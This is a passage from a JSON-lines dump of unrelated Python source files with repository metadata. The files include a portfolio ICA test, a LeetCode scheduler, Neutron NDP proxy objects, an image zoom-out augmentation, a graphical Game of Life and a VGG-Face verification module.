datagen\n\n","repo_name":"archembaud/ADACS_ML_D","sub_path":"utilities.py","file_name":"utilities.py","file_ext":"py","file_size_in_byte":2153,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"44179523658","text":"from quantfinance.data import get_stocks_prices_yahoo\nfrom quantfinance.portfolio_ica import portfolio_ica\n\n\ndef test_portfolio_ica():\n    prices = get_stocks_prices_yahoo(\n        [\"VTI\", \"AGG\", \"DBC\", \"^VIX\"],\n        frequency=\"daily\",\n        start=\"2010-07-31\",\n        end=\"2020-12-31\",\n    )\n\n    returns = prices.pct_change().dropna()\n\n    returns = returns.values\n\n    returns_independent, returns_pca, _, _ = portfolio_ica(returns, num_pca=2)\n\n    assert returns_independent.shape[1] == 2\n    assert returns_pca.shape[1] == 2\n\n\ndef test_portfolio_ica_no_components():\n    prices = get_stocks_prices_yahoo(\n        [\"VTI\", \"AGG\", \"DBC\", \"^VIX\"],\n        frequency=\"daily\",\n        start=\"2010-07-31\",\n        end=\"2020-12-31\",\n    )\n\n    returns = prices.pct_change().dropna()\n\n    returns = returns.values\n\n    returns_independent, returns_pca, _, _ = portfolio_ica(returns, num_pca=None)\n\n    assert returns_independent.shape[1] == 3\n    assert returns_pca.shape[1] == 
3\n","repo_name":"howardya/quantfinance","sub_path":"test/test_portfolio_ica.py","file_name":"test_portfolio_ica.py","file_ext":"py","file_size_in_byte":982,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"5438493173","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Tue Sep 19 14:44:57 2017\n\n@author: ksagilop\n\n1.2 Recursive Directory Tree\nImplement a program that asks for a directory and \nprints all the files in that directory recursively\nas a tree.\n\nHints:\n- Use the os.listdir() and os.path.isdir() functions\n\"\"\"\n# Modules\nimport os\n\ndef user():\n    '''Ask the user for the directory path to be read.'''\n    path = input('Directory path? ')\n    return path\n\n# With os.listdir() alone it is not obvious how to recurse\ndef tree(path):\n    '''Construct the directory tree in accordance with the path provided'''\n    s = '\\\\' # construct a \ literally by \\\\\n    print(path + s)\n    items = os.listdir(path)\n    for i in range(len(items)):\n        item = os.path.join(path, items[i])\n        if os.path.isdir(item):\n            print('|--', items[i] + s)\n        else: print('|--', items[i])\n    return\n    \npath = user()\n#tree(path)\n\n# Another way to get folder, subfolder and files is with os.walk\nfor dirs, subs, files in os.walk(path):\n    print(dirs)\n    print(subs)\n    print(files)","repo_name":"pandastrail/InfoEng","sub_path":"scripting/exercises/P05_1_2.py","file_name":"P05_1_2.py","file_ext":"py","file_size_in_byte":1062,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"3435513980","text":"from collections import Counter, deque\nfrom typing import List\nimport heapq\nclass Solution:\n    def leastInterval(self, tasks: List[str], n: int) -> int:\n        task_q = [(-count,task) for task,count in Counter(tasks).items()]\n        heapq.heapify(task_q)\n        cooldown_q = deque([])\n        \n        t = 0\n        while task_q or cooldown_q:\n            while cooldown_q and cooldown_q[-1][0] <= t:\n                t_cooldown, count, task = cooldown_q.pop()\n                heapq.heappush(task_q, (count, task))\n            \n            if task_q:\n                count, task = heapq.heappop(task_q)\n            else:\n                t_cooldown, count, task = cooldown_q.pop()\n                #print(f\"{t}: idle x{t_cooldown-t}\")\n                t = t_cooldown\n            count += 1\n            #print(f\"{t+1}: {task}, rem:{-count}\")\n            if count < 0:\n                cooldown_q.appendleft((t+1+n, count, task))\n            t += 1\n        \n        return t\n","repo_name":"jlcarr/LeetCode","sub_path":"Problem_0621/solution.py","file_name":"solution.py","file_ext":"py","file_size_in_byte":958,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"8671851841","text":"import netaddr\n\nfrom neutron_lib.objects import common_types\nfrom oslo_log import log as logging\nfrom oslo_versionedobjects import fields as obj_fields\n\nfrom neutron.db.models import ndp_proxy as models\nfrom neutron.objects import base\n\nLOG = logging.getLogger(__name__)\n\n\n@base.NeutronObjectRegistry.register\nclass NDPProxy(base.NeutronDbObject):\n    # Version 1.0: Initial version\n    VERSION = '1.0'\n\n    db_model = models.NDPProxy\n\n    primary_keys = ['id']\n    foreign_keys = {'Router': {'router_id': 'id'}, 'Port': {'port_id': 'id'}}\n\n    fields = {\n        'id': common_types.UUIDField(),\n        'name': obj_fields.StringField(nullable=True),\n        'project_id': obj_fields.StringField(nullable=True),\n        'router_id': common_types.UUIDField(nullable=False),\n        'port_id': common_types.UUIDField(nullable=False),\n        'ip_address': obj_fields.IPV6AddressField(),\n        'description': obj_fields.StringField(nullable=True)\n    }\n\n    fields_no_update = ['id', 'project_id']\n\n    @classmethod\n    def 
modify_fields_from_db(cls, db_obj):\n        result = super(NDPProxy, cls).modify_fields_from_db(db_obj)\n        if 'ip_address' in result:\n            result['ip_address'] = netaddr.IPAddress(\n                result['ip_address'])\n        return result\n\n    @classmethod\n    def modify_fields_to_db(cls, fields):\n        result = super(NDPProxy, cls).modify_fields_to_db(fields)\n        if 'ip_address' in result:\n            if result['ip_address'] is not None:\n                result['ip_address'] = cls.filter_to_str(\n                    result['ip_address'])\n        return result\n\n\n@base.NeutronObjectRegistry.register\nclass RouterNDPProxyState(base.NeutronDbObject):\n    # Version 1.0: Initial version\n    VERSION = '1.0'\n    db_model = models.RouterNDPProxyState\n\n    foreign_keys = {'Router': {'router_id': 'id'}}\n    primary_keys = ['router_id']\n\n    fields = {\n        'router_id': common_types.UUIDField(nullable=False),\n        'enable_ndp_proxy': obj_fields.BooleanField(nullable=False),\n    }\n","repo_name":"openstack/neutron","sub_path":"neutron/objects/ndp_proxy.py","file_name":"ndp_proxy.py","file_ext":"py","file_size_in_byte":2024,"program_lang":"python","lang":"en","doc_type":"code","stars":1353,"dataset":"github-code","pt":"72"} +{"seq_id":"39217632869","text":"def lingkaran(r):\n    luas = 3.14 * (r**2)\n    keliling = 2 * 3.14 * r\n    print(\"luas lingkaran : \", luas)\n    print(\"keliling lingkaran : \", keliling)\n    \n\ndef segitiga(a,t):\n    luas = 1/2 * a * t\n    keliling = a * 3\n    print(\"luas segitiga : \", luas)\n    print(\"keliling segitiga : \", keliling)\n    \n","repo_name":"assidik12/TA-python","sub_path":"modul.py","file_name":"modul.py","file_ext":"py","file_size_in_byte":308,"program_lang":"python","lang":"id","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"8507489970","text":"import copy\nimport math\nimport torch\nimport random\nimport numpy as np\nfrom detectron2.structures.boxes import Boxes\nfrom detectron2.structures.masks import PolygonMasks\nfrom detectron2.augmentations.image_level_augs.scale_jitter import scale_jitter\nfrom detectron2.augmentations.vis import _vis\n\n\nclass Zoom_out(object):\n    def __init__(self, ratio=1.0, img_pool_size=10, iou_threshold=0.5, size_divisible=2):\n        self.ratio = ratio\n        self.img_pool = []\n        self.img_pool_size = img_pool_size\n        self.iou_threshold = iou_threshold\n        self.size_divisible = size_divisible\n\n    def __call__(self, tensor, target):\n        if self.ratio >= 1.0:\n            return tensor, target\n\n        self.img_pool.append({'tensor': tensor, 'target': target})\n\n        if len(self.img_pool) > self.img_pool_size:\n            self.img_pool.pop(0)\n\n        if len(self.img_pool) < 4:\n            return tensor, target\n\n        use_mask = ('gt_masks' in target)\n\n        bbox = target['gt_boxes']\n        classes = target['gt_classes']\n        masks = target['gt_masks'] if use_mask else None\n\n        c, h, w = tensor.shape\n        h = int(math.ceil(h / self.size_divisible) * self.size_divisible)\n        w = int(math.ceil(w / self.size_divisible) * self.size_divisible)\n\n        new_h, new_w = int(self.ratio * h), int(self.ratio * w)\n        in_tensor, in_bbox, in_mask = scale_jitter(tensor, bbox, self.ratio, (new_h, new_w), masks)\n\n        pad_imgs = random.sample(self.img_pool, 3)\n        pad_tensors, pad_bboxes, pad_masks = [], [], []\n        for img in pad_imgs:\n            pad_tensor, pad_bbox, pad_mask = scale_jitter(img['tensor'], img['target']['gt_boxes'], self.ratio, (new_h, new_w), img['target']['gt_masks'] if use_mask else None)\n            pad_tensors.append(pad_tensor)\n            pad_bboxes.append(pad_bbox)\n            pad_masks.append(pad_mask)\n\n        crop_boxes = [(new_h, w-new_w), (h-new_h, new_w), (h-new_h, w-new_w)]\n\n        tensor_out = in_tensor.new(*(c, h, w)).zero_()\n        tensor_out[:c, 
:new_h, :new_w].copy_(in_tensor)\n tensor_out[:c, :new_h, new_w:].copy_(pad_tensors[0][:c, :crop_boxes[0][0], :crop_boxes[0][1]])\n tensor_out[:c, new_h:, :new_w].copy_(pad_tensors[1][:c, :crop_boxes[1][0], :crop_boxes[1][1]])\n tensor_out[:c, new_h:, new_w:].copy_(pad_tensors[2][:c, :crop_boxes[2][0], :crop_boxes[2][1]])\n\n crop_bboxes, crop_classes, crop_masks = [], [], []\n for i, pad_bbox in enumerate(pad_bboxes):\n crop_bbox = copy.deepcopy(pad_bbox)\n crop_bbox.clip(crop_boxes[i])\n ious = crop_bbox.area() / pad_bbox.area()\n inds = ious >= self.iou_threshold\n crop_bbox = crop_bbox[inds]\n crop_bboxes.append(crop_bbox)\n crop_classes.append(pad_imgs[i]['target']['gt_classes'][inds])\n if use_mask:\n crop_masks.append([mask for j, mask in enumerate(pad_masks[i]) if inds[j]])\n\n offsets_box = [torch.Tensor([0.0,0.0,0.0,0.0]), torch.Tensor([new_w, 0.0, new_w, 0.0]), torch.Tensor([0.0, new_h, 0.0, new_h]), torch.Tensor([new_w, new_h, new_w, new_h])]\n offsets_mask = [[0.0, 0.0], [0.0, new_w], [new_h, 0], [new_h, new_w]]\n bbox_out = Boxes(torch.cat([target.tensor + offsets_box[i] for i, target in enumerate([in_bbox] + crop_bboxes)], dim=0))\n classes_out = torch.cat([classes] + crop_classes, dim=0)\n target_out = {'gt_boxes': bbox_out, 'gt_classes': classes_out}\n\n if use_mask:\n masks_out = []\n for i, crop_mask in enumerate([in_mask]+crop_masks):\n mask_out = []\n for polys in crop_mask:\n poly_out = []\n for poly in polys:\n poly_new = copy.deepcopy(poly)\n poly_new[0::2] = poly_new[0::2] + offsets_mask[i][1]\n poly_new[1::2] = poly_new[1::2] + offsets_mask[i][0]\n poly_out.append(poly_new)\n mask_out.append(poly_out)\n\n masks_out += mask_out\n masks_out = PolygonMasks(masks_out)\n target_out['gt_masks'] = masks_out\n\n return tensor_out, target_out\n","repo_name":"qqlu/Entity","sub_path":"Entity/EntitySegRLE/entityseg/data/augmentations/image_level_augs/zoom_out.py","file_name":"zoom_out.py","file_ext":"py","file_size_in_byte":4213,"program_lang":"python","lang":"en","doc_type":"code","stars":593,"dataset":"github-code","pt":"72"} +{"seq_id":"36291970037","text":"from string import ascii_uppercase, ascii_lowercase\ndef solution(s, n):\n answer = ''\n uppercase_converter, lowercase_converter = dict(), dict()\n for i in range(len(ascii_uppercase)):\n uppercase_converter[ascii_uppercase[i]]=ascii_uppercase[(i+n)%26]\n lowercase_converter[ascii_lowercase[i]]=ascii_lowercase[(i+n)%26]\n for c in s:\n if c==' ':\n answer+=c\n elif c.isupper():\n answer+=uppercase_converter[c]\n else:\n answer+=lowercase_converter[c]\n return answer","repo_name":"Pazbear/CodingTestStudy","sub_path":"프로그래머스/LV1/시저_암호.py","file_name":"시저_암호.py","file_ext":"py","file_size_in_byte":540,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"24180605493","text":"import re\r\n\r\n\r\nclass Lnode():\r\n def __init__(self, line):\r\n line = line.rstrip('\\n')\r\n n = line.split(\"\\t\", 5)\r\n self.id = int(n[0])\r\n self.is_merged = False\r\n self.age = self.init_age(n[1])\r\n self.gender = int(n[2])\r\n self.tweet_number = int(n[3])\r\n self.tags = set(n[4].split(\";\"))\r\n self.key_words = self.init_key_word(n[5].split(\";\"))\r\n self.group = [int(n[0])]\r\n\r\n def init_age(self, birth):\r\n if re.search(\"-\", birth):\r\n return 0\r\n else:\r\n return 2018 - int(birth)\r\n\r\n def init_key_word(self, key_word_list):\r\n key_word_ = set()\r\n for key_word in key_word_list:\r\n k = key_word.split(\":\")\r\n key_word_.add(k[0])\r\n return 
key_word_\r\n\r\n    @staticmethod\r\n    def are_nodes_similar(lnode1, lnode2):\r\n        weight = 0\r\n\r\n        # is age of two nodes similar\r\n        if lnode1.age == 0 or lnode2.age == 0:\r\n            weight += 0.1\r\n        else:\r\n            age_diff = int(lnode1.age) - (lnode2.age)\r\n            if -3 < age_diff < 3:\r\n                weight += 0.2\r\n            elif -5 < age_diff < 5:\r\n                weight += 0.15\r\n            elif -7 < age_diff < 7:\r\n                weight += 0.1\r\n            elif -10 < age_diff < 10:\r\n                weight += 0.05\r\n\r\n        # is gender of two nodes similar\r\n        if lnode1.gender == 0 or lnode2.gender == 0:\r\n            weight += 0.1\r\n        elif -0.1 < lnode1.gender - lnode2.gender < 0.1:\r\n            weight += 0.2\r\n        elif -0.2 < lnode1.gender - lnode2.gender < 0.2:\r\n            weight += 0.15\r\n        elif -0.3 < lnode1.gender - lnode2.gender < 0.3:\r\n            weight += 0.1\r\n        elif -0.4 < lnode1.gender - lnode2.gender < 0.4:\r\n            weight += 0.05\r\n\r\n        # is tweet_number of two nodes similar\r\n        if lnode1.tweet_number != 0 and lnode2.tweet_number != 0:\r\n            tweet_number1, tweet_number2 = lnode1.tweet_number, lnode2.tweet_number\r\n            if tweet_number1 < tweet_number2:\r\n                tweet_number1, tweet_number2 = tweet_number2, tweet_number1\r\n            times = tweet_number1 / tweet_number2\r\n            if times < 1.2:\r\n                weight += 0.1\r\n            elif times < 2:\r\n                weight += 0.05\r\n\r\n        # is tag of two nodes similar\r\n        min_set_len = len(lnode1.tags) if len(lnode1.tags) <= len(lnode2.tags) else len(lnode2.tags)\r\n        inter_set_len = len(lnode1.tags & lnode2.tags)\r\n        weight += (inter_set_len / min_set_len) * 0.3\r\n\r\n        # are key words of two nodes similar\r\n        min_set_len = len(lnode1.key_words) if len(lnode1.key_words) <= len(lnode2.key_words) else len(lnode2.key_words)\r\n        inter_set_len = len(lnode1.key_words & lnode2.key_words)\r\n        weight += (inter_set_len / min_set_len) * 0.2\r\n\r\n        return weight\r\n\r\n    @staticmethod\r\n    def merge_nodes_attribute(lnode1, lnode2):\r\n        len1 = len(lnode1.group)\r\n        len2 = len(lnode2.group)\r\n        lnode1.age = (lnode1.age * len1 + lnode2.age * len2) / (len1 + len2)\r\n        lnode1.gender = (lnode1.gender * len1 + lnode2.gender * len2) / (len1 + len2)\r\n        lnode1.tweet_number = (lnode1.tweet_number * len1 + lnode2.tweet_number * len2) / (len1 + len2)\r\n        lnode1.tags = lnode1.tags | lnode2.tags\r\n        lnode1.key_words = lnode1.key_words | lnode2.key_words\r\n        lnode1.group.extend(lnode2.group)\r\n        lnode2.group.clear()\r\n        lnode2.is_merged = True\r\n","repo_name":"yangli655/weibo_community_detect","sub_path":"Lnode.py","file_name":"Lnode.py","file_ext":"py","file_size_in_byte":3504,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"11208734164","text":"from random import choice\nfrom time import sleep\nfrom graphics import *\nfrom math import floor\n\n# Setup: board size, random value generator, create board and rectangles.\n\ndef size():\n    \"\"\" Returns the size of the board.\"\"\"\n    return 16\n\ndef random_bit():\n    \"\"\"Returns a random value of True or False.\"\"\"\n    return choice([True,False])\n\ndef initiate():\n    \"\"\"Returns an initial (random) board and accompanying rectangles.\"\"\"\n    board = []\n    for i in range(size()): # fills in the initial board.\n        row = []\n        for j in range(size()):\n            row.append(random_bit())\n        board.append(row)\n    \n    rectangles = [] \n    for i in range(size()): # constructs initial rectangles.\n        row = []\n        for j in range(size()):\n            row.append(Rectangle(Point(i,j),Point(i+1,j+1)))\n        rectangles.append(row)\n    \n    return (board,rectangles)\n    \n# Graphical methods. 
Please note: I changed the colours in update_color\n# because the grey used in the exercise appeared black on my computer.\n\ndef update_color(x,y,board,rectangles):\n \"\"\"Sets color in rectangles[x][y] to correct value according to the\n status of its corresponding cell in board.\"\"\"\n if (board[x][y]):\n rectangles[x][y].setFill(\"DarkRed\")\n else:\n rectangles[x][y].setFill(\"DimGray\")\n\ndef set_colors(board,rectangles):\n \"\"\"Given a board, colours all rectangles accordingly.\"\"\"\n for i in range(size()):\n for j in range(size()):\n update_color(i,j,board,rectangles)\n\ndef set_changed_colors(board,rectangles,changes):\n \"\"\"Only updates the cell colour for changed states.\"\"\"\n for cell in changes:\n [i,j] = cell\n update_color(i,j,board,rectangles)\n\ndef draw_cells(rectangles,window):\n \"\"\"Draws rectangles' cells in the window.\"\"\"\n for row in rectangles:\n for cell in row:\n cell.draw(window)\n\n# General game components.\n\ndef living_neighbors(x,y,board):\n \"\"\" Counts the number of living neighbors of the cell in the given\n coordinate (x,y). If either coordinate is on the edge, we wrap.\n Finally, we return the number of neighbors.\"\"\"\n neighbors = 0\n\n top1 = board[(x-1)%size()][(y+1)%size()]\n top2 = board[x][(y+1)%size()]\n top3 = board[(x+1)%size()][(y+1)%size()]\n mid1 = board[(x-1)%size()][y]\n mid2 = board[(x+1)%size()][y]\n low1 = board[(x-1)%size()][(y-1)%size()]\n low2 = board[x][(y-1)%size()]\n low3 = board[(x+1)%size()][(y-1)%size()]\n\n list_of_neighbors = [top1,top2,top3,mid1,mid2,low1,low2,low3]\n\n for cell in list_of_neighbors:\n if cell == True:\n neighbors = neighbors + 1\n return neighbors\n\ndef change_list(board1,board2):\n \"\"\"Takes in two boards and returns a list of coordinates for those\n cells which have switched state.\"\"\"\n changes = []\n for i in range(size()):\n for j in range(size()):\n if board1[i][j] != board2[i][j]:\n changes.append([i,j])\n return(changes)\n\ndef iterate(board):\n \"\"\"Does one iteration, returns the next generation of cells.\n Returns the tuple (living,new_board), where living is the number of\n live cells and board is a matrix of boolean values corresponding\n to the liveness of each cell.\"\"\"\n new_board = [] \n for i in range(size()): # generates a completely False board.\n row = []\n for j in range(size()):\n row.append(False)\n new_board.append(row)\n \n for i in range(size()): # living cells set to True; False otherwise.\n for j in range(size()):\n if board[i][j] == True:\n new_board[i][j] = (1 < living_neighbors(i,j,board) < 4)\n else:\n new_board[i][j] = (living_neighbors(i,j,board) == 3) \n\n living = 0 # counts the living\n for i in range(size()):\n for j in range(size()):\n if new_board[i][j] == True:\n living = living + 1\n\n changes = change_list(new_board,board)\n return (living,new_board,changes)\n\n# Oppgave 1's main method is mini_life():\n\ndef mini_life():\n \"\"\"Simple version of Game of Life. Runs through life cycles in a\n 16x16 grid. 
User kills process manually.\"\"\"\n\n window = GraphWin(\"Game of Life: mini-edition\",400,400)\n window.setCoords(0,0,size(),size())\n \n (base_board,rectangles) = initiate()\n set_colors(base_board,rectangles)\n draw_cells(rectangles,window)\n while True:\n (living,new_board,changes) = iterate(base_board)\n base_board = new_board\n set_changed_colors(base_board,rectangles,changes)\n sleep(0.4)\n\n# Oppgave 2's main method is big_life(), will use the following:\n\ndef is_inside(button,point):\n \"\"\"Returns True iff the point lies inside the button.\"\"\"\n x_pt = point.getX()\n y_pt = point.getY()\n x_lo = button.getP1().getX()\n y_lo = button.getP1().getY()\n x_hi = button.getP2().getX()\n y_hi = button.getP2().getY()\n return (x_lo < x_pt < x_hi) and (y_lo < y_pt < y_hi)\n\ndef in_grid(point):\n \"\"\"Yields True iff point is on the board (i.e., if user has clicked\n a cell.)\"\"\"\n x_pt = point.getX()\n y_pt = point.getY()\n lo = 0\n hi = size()\n return (lo <= x_pt <= hi) and (lo <= y_pt <= hi)\n\n\ndef big_life():\n \"\"\"Full version of Game of Life. Starts with a randomized board.\n User can type a number of iterations in the Cycles field and START\n the game. User can CLEAR, RANDOMIZE, LOAD or SAVE a board. Clicking\n on a cell switches its state. Use QUIT to exit.\"\"\"\n \n window = GraphWin(\"Game of Life\",500,600)\n window.setCoords(0,-3,size(),size())\n window.setBackground(\"white\")\n\n# We start by generating the iteration entry field, buttons and text.\n\n entry = Entry(Point(1,-0.5),5)\n entry.setText(\"13\") # default value makes START usable immediately.\n entry_text = Text(Point(1,-1.2),\"Cycles\")\n entry.draw(window)\n entry_text.draw(window)\n\n y1 = -2.9 # these y-values are used with all buttons and their text.\n y2 = -0.1\n y3 = -2.5 \n\n st_pt1 = Point(1.76,y1)\n st_pt2 = Point(3.74,y2)\n start = Rectangle(st_pt1,st_pt2)\n start_text = Text(Point(2.75,y3),\"START\")\n start.setFill(\"MediumSeaGreen\")\n start.setOutline(\"white\")\n start.draw(window)\n start_text.draw(window)\n\n cl_pt1 = Point(3.76,y1)\n cl_pt2 = Point(5.74,y2)\n clear = Rectangle(cl_pt1,cl_pt2)\n clear_text = Text(Point(4.75,y3),\"CLEAR\")\n clear.setFill(\"DeepSkyBlue\")\n clear.setOutline(\"white\")\n clear.draw(window)\n clear_text.draw(window)\n\n ran_pt1 = Point(5.76,y1)\n ran_pt2 = Point(8.74,y2)\n randomize = Rectangle(ran_pt1,ran_pt2)\n random_text = Text(Point(7.25,y3),\"RANDOMIZE\")\n randomize.setFill(\"DarkOrchid\")\n randomize.setOutline(\"white\")\n randomize.draw(window)\n random_text.draw(window)\n\n ld_pt1 = Point(8.76,y1)\n ld_pt2 = Point(10.74,y2)\n load = Rectangle(ld_pt1,ld_pt2)\n load_text = Text(Point(9.75,y3),\"LOAD\")\n load.setFill(\"MediumVioletRed\")\n load.setOutline(\"white\")\n load.draw(window)\n load_text.draw(window)\n\n sv_pt1 = Point(10.76,y1)\n sv_pt2 = Point(13.74,y2)\n save = Rectangle(sv_pt1,sv_pt2)\n save_text = Text(Point(12.25,y3),\"SAVE\")\n save.setFill(\"Gold\")\n save.setOutline(\"white\")\n save.draw(window)\n save_text.draw(window)\n\n gb_pt1 = Point(13.76,y1)\n gb_pt2 = Point(16,y2)\n goodbye = Rectangle(gb_pt1,gb_pt2)\n bye_text = Text(Point(14.875,y3),\"QUIT\")\n goodbye.setFill(\"FireBrick\")\n goodbye.setOutline(\"white\")\n goodbye.draw(window)\n bye_text.draw(window)\n\n\n# We then get an initial board for the Game of Life:\n (base_board,rectangles) = initiate()\n set_colors(base_board,rectangles)\n draw_cells(rectangles,window)\n go_on = True\n\n# Users can now click the buttons.\n while go_on == True:\n click = 
window.getMouse()\n\n if is_inside(start,click):\n iterations_text = entry.getText()\n iterations = eval(iterations_text)\n for cycles in range(iterations):\n (live,new_board,changes) = iterate(base_board)\n base_board = new_board\n set_changed_colors(base_board,rectangles,changes)\n sleep(0.4)\n\n elif is_inside(clear,click):\n cleared_board = []\n for i in range(size()):\n row = []\n for j in range(size()):\n row.append(False)\n cleared_board.append(row)\n changes = change_list(cleared_board,base_board)\n base_board = cleared_board\n set_changed_colors(base_board,rectangles,changes)\n\n elif is_inside(randomize,click):\n (random_board,new_rectangles) = initiate()\n changes = change_list(random_board,base_board)\n base_board = random_board\n set_changed_colors(base_board,rectangles,changes)\n\n# Note: loaded/saved boards are txt files containing rows of True/False.\n elif is_inside(load,click):\n filename = input(\"Please choose the file to load: \")\n file = open(filename,\"r\")\n print(\"Building new board...\")\n loaded_board = []\n for text_row in file.readlines():\n row = []\n states = text_row.split()\n for state in states:\n row.append(eval(state))\n loaded_board.append(row)\n changes = change_list(loaded_board,base_board)\n base_board = loaded_board\n set_changed_colors(base_board,rectangles,changes)\n print(\"Board loaded.\")\n file.close()\n\n elif is_inside(save,click):\n filename = input(\"Please provide a filename: \")\n file = open(filename,\"w\")\n print(\"Writing to file...\")\n for row in base_board:\n line = \"\"\n for value in range(size()):\n line = line+str(row[value])+\" \"\n line = line+\"\\n\"\n file.write(line)\n print(\"Wrote to file.\")\n file.close()\n\n elif is_inside(goodbye,click):\n go_on = False\n window.close()\n\n elif in_grid(click):\n x = floor(click.getX())\n y = floor(click.getY())\n base_board[x][y] = not base_board[x][y]\n changed_cell = [x,y]\n set_changed_colors(base_board,rectangles,[changed_cell])\n","repo_name":"jaakson/GameOfLife","sub_path":"gameoflife.py","file_name":"gameoflife.py","file_ext":"py","file_size_in_byte":10431,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"47140247860","text":"import time\nimport os\nfrom os import path\nimport numpy as np\nimport pandas as pd\nfrom tqdm import tqdm\nimport pickle\nfrom basemodels import VGGFace\nfrom commons import functions\n\nfrom commons import functions, distance as dst\n\n\ndef represent(img_path, model=None, enforce_detection=True, detector_backend='opencv',\n align=True, normalization='base'):\n \"\"\"\n This function represents facial images as vectors\n\n Parameters:\n img_path: exact image path, numpy array (BGR) or based64 encoded images could be passed.\n model: Built model. A face recognition model is built every call of verify function. You can pass pre-built face recognition model optionally if you will call verify function several times. Consider to pass model if you are going to call represent function in a for loop.\n model = build_model('VGG-Face')\n enforce_detection (boolean): If any face could not be detected in an image, then verify function will return exception. Set this to False not to have this exception. This might be convenient for low resolution images.\n detector_backend (string): set face detector backend as retinaface, mtcnn, opencv, ssd or dlib\n normalization (string): normalize the input image before feeding to model\n Returns:\n Represent function returns a multidimensional vector. 
\n\ndef build_model():\n    \"\"\"\n    This function builds a VGG-Face model\n    Returns:\n        built model\n    \"\"\"\n    model_name = 'VGG-Face'\n    global model_obj  # singleton design pattern\n\n    models = {\n        'VGG-Face': VGGFace.loadModel,\n    }\n\n    if \"model_obj\" not in globals():\n        model_obj = {}\n\n    if model_name not in model_obj.keys():\n        model = models.get(model_name)\n        if model:\n            model = model()\n            model_obj[model_name] = model\n        else:\n            raise ValueError('Invalid model_name passed - {}'.format(model_name))\n\n    return model_obj[model_name]\n
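\n# Example: thanks to the module-level cache above, repeated calls reuse the\n# same loaded weights instead of rebuilding them:\n#   m1 = build_model(); m2 = build_model(); m1 is m2  # True\n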
\n\ndef verify(img1_path, img2_path, distance_metric='cosine', model=None, enforce_detection=True,\n           detector_backend='opencv', align=True, prog_bar=True, normalization='base'):\n    \"\"\"\n    This function verifies whether an image pair shows the same person or two different persons.\n    Parameters:\n        img1_path, img2_path (string): exact image path, numpy array (BGR) or base64 encoded images could be passed.\n        distance_metric (string): cosine, euclidean, euclidean_l2\n        model (string): built model. A face recognition model is built on every call of the verify function. You can optionally pass a pre-built face recognition model if you will call verify several times.\n        enforce_detection (boolean): If no face can be detected in an image, this function raises an exception by default. Set this to False not to have this exception. This might be convenient for low resolution images.\n        detector_backend (string): set face detector backend as retinaface, mtcnn, opencv, ssd or dlib\n        align (boolean): face alignment\n        prog_bar (boolean): enable/disable a progress bar\n        normalization (string): base: no normalization, ..\n    Returns:\n        Verify function returns a dictionary.\n    \"\"\"\n    tic = time.time()\n\n    img_list = [[img1_path, img2_path]]\n\n    resp_objects = []\n\n    model_names = []\n    metrics = []\n    model_names.append('VGG-Face')\n    metrics.append(distance_metric)\n\n    # model_name = 'VGG-Face'\n    # metric = distance_metric\n    if model is None:\n        model = build_model()\n    models = {}\n    models['VGG-Face'] = model\n\n    disable_option = (False if len(img_list) > 1 else True) or not prog_bar\n\n    pbar = tqdm(range(0, len(img_list)), desc='Verification', disable=disable_option)\n\n    for index in pbar:\n        instance = img_list[index]\n\n        if isinstance(instance, list) and len(instance) >= 2:\n            img1_path = instance[0]\n            img2_path = instance[1]\n\n            custom_model = models['VGG-Face']\n            img1_representation = represent(img_path=img1_path,\n                                            model=custom_model,\n                                            enforce_detection=enforce_detection, detector_backend=detector_backend,\n                                            align=align,\n                                            normalization=normalization)\n            img2_representation = represent(img_path=img2_path,\n                                            model=custom_model,\n                                            enforce_detection=enforce_detection, detector_backend=detector_backend,\n                                            align=align,\n                                            normalization=normalization)\n\n            # find distance between embeddings\n            for j in metrics:\n                if j == 'cosine':\n                    distance = dst.findCosineDistance(img1_representation, img2_representation)\n                else:\n                    raise ValueError('Invalid distance_metric passed - ', distance_metric)\n\n                distance = np.float64(distance)\n\n                # decision\n\n                threshold = dst.findThreshold('VGG-Face', j)\n\n                identified = distance <= threshold\n\n                resp_obj = {\n                    \"verified\": identified,\n                    \"distance\": distance,\n                    \"threshold\": threshold,\n                    \"model\": 'VGG-Face',\n                    \"detector_backend\": detector_backend,\n                    \"similarity_metric\": distance_metric\n                }\n                return resp_obj\n\n        else:\n            raise ValueError(\"Invalid arguments passed to verify function: \", instance)\n\n    toc = time.time()\n\n\ndef detectFace(img_path, target_size=(224, 224), detector_backend='opencv', enforce_detection=True, align=True):\n    \"\"\"\n    This function applies pre-processing stages of a face recognition pipeline including detection and alignment\n\n    Parameters:\n        img_path: exact image path, numpy array (BGR) or base64 encoded image\n\n        detector_backend (string): face detection backends are retinaface, mtcnn, opencv, ssd or dlib\n\n    Returns:\n        detected and aligned face in numpy format\n    \"\"\"\n    img = functions.preprocess_face(img=img_path, target_size=target_size, detector_backend=detector_backend,\n                                    enforce_detection=enforce_detection, align=align)[\n        0]  # preprocess_face returns (1, 224, 224, 3)\n    return img[:, :, ::-1]  # bgr to rgb\n
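\n# Example (hypothetical path): the returned crop is RGB at the requested size,\n#   face = detectFace(\"img1.jpg\")  # face.shape -> (224, 224, 3)\n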
\n\ndef find(img_path, db_path, distance_metric='cosine', model=None, enforce_detection=True, detector_backend='opencv',\n         align=True, prog_bar=True, normalization='base', silent=False):\n    \"\"\"\n    This function applies verification several times and finds an identity in a database\n\n    Parameters:\n        img_path: exact image path, numpy array (BGR) or base64 encoded image. If you are going to find several identities, then you should pass img_path as an array instead of calling the find function in a for loop. e.g. img_path = [\"img1.jpg\", \"img2.jpg\"]\n        db_path (string): You should store some .jpg files in a folder and pass the exact folder path to this.\n        distance_metric (string): cosine, euclidean, euclidean_l2\n        model: built deepface model. A face recognition model is built on every call of the find function. You can pass a pre-built model to speed the function up.\n        enforce_detection (boolean): The function throws an exception if a face could not be detected. Set this to False if you don't want this exception. This might be convenient for low 